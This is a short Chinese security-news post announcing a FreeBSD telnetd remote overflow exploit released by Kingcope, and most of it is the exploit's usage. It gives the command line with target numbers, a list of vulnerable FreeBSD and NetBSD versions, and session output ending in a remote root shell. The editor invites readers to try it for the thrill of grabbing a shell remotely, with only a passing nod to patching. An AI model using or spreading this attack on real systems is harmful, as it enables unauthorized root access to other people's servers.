[0day快报]FreeBSD全版本Telnetd远程溢出漏洞(附Exp)
小编:2012/6/30在seclists上有人放出了Kingcope神牛写的针对FreeBSD全版本的telnetd远程溢出漏洞,有环境的可以测试体验下千里隔空取Shell的快感。当然,作为白帽子,漏洞修补是头等大事:)
小编本地测试FreeBSD 7.1 i386测试成功,如下图:
利用方法如下:
h4x# /usr/bin/telnet -t 8 192.168.2.8
BSD telnetd Remote Root Exploit *ZERODAY*
By Kingcope
Year 2011
usage: telnet [-4] [-6] [-8] [-E] [-K] [-L] [-N] [-S tos] [-X atype] [-c] [-d]
[-e char] [-k realm] [-l user] [-f/-F] [-n tracefile] [-r] [-s
src_addr] [-u] [-P policy] [-y] <-t TARGET_NUMBER> [host-name
[port]]
TARGETS:
0 FreeBSD 8.2 i386
1 FreeBSD 8.0/8.1/8.2 i386
2 FreeBSD 7.3/7.4 i386
3 FreeBSD 6.2/6.3/6.4 i386
4 FreeBSD 5.3/5.5 i386
5 FreeBSD 4.9/4.11 i386
6 NetBSD 5.0/5.1 i386
7 NetBSD 4.0 i386
8 FreeBSD 8.2 amd64
9 FreeBSD 8.0/8.1 amd64
10 FreeBSD 7.1/7.3/7.4 amd64
11 FreeBSD 7.1 amd64
12 FreeBSD 7.0 amd64
13 FreeBSD 6.4 amd64
14 FreeBSD 6.3 amd64
15 FreeBSD 6.2 amd64
16 FreeBSD 6.1 amd64
17 TESTING i386
18 TESTING amd64
Trying 192.168.2.8...
Connected to 192.168.2.8.
Escape character is '^]'.
Trying SRA secure login:
*** EXPLOITING REMOTE TELNETD
*** by Kingcope
*** Year 2011
USING TARGET -- FreeBSD 8.2 amd64
SC LEN: 30
ALEX-ALEX
6:36PM up 5 mins, 1 user, load averages: 0.01, 0.15, 0.09
USER TTY FROM LOGIN@ IDLE WHAT
kcope pts/0 192.168.2.3 6:32PM 4 _su (csh)
FreeBSD h4x.Belkin 8.2-RELEASE FreeBSD 8.2-RELEASE #0: Thu Feb 17
02:41:51 UTC 2011
root () mason cse buffalo edu:/usr/obj/usr/src/sys/GENERIC amd64
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
greetings to divineint